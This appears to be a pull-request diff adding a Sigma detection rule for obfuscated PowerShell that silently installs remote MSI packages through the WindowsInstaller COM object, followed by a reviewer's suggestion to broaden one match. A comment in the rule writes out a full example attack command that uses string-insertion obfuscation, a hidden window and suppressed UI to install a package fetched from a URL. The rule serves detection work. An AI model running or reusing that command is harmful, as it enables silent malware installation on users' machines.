rules/windows/process_creation/proc_creation_win_powershell_comobject_msi.yml

```
@@ -0,0 +1,45 @@
+title: Obfuscated PowerShell Silent MSI Install via WindowsInstaller COM
+id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
+status: experimental
+description: |
+    Detects the execution of obfuscated PowerShell commands that attempt to silently install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
+    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
+    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
+    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
+    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
+references:
+    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
+    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
+    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
+author: Meroujan Antonyan (vx3r)
+date: 2025-05-27
+tags:
+    - attack.defense-evasion
+    - attack.t1027.010
+    - attack.t1218.007
+    - attack.execution
+    - attack.t1059.001
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    # Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
+    selection_img:
+        - Image|endswith:
+              - '\powershell_ise.exe'
+              - '\powershell.exe'
+              - '\pwsh.exe'
+        - OriginalFileName:
+              - 'PowerShell_ISE.EXE'
+              - 'PowerShell.EXE'
+              - 'pwsh.dll'
+    selection_cli:
+        CommandLine|contains|all:
+            - '-ComObject'
+            - 'InstallProduct('
+            - '.Insert('
+            - 'UILevel=2'
```

```suggestion
            - 'UILevel'
```
for better coverage, it could be UILevel =2 or UILevel= 2, etc.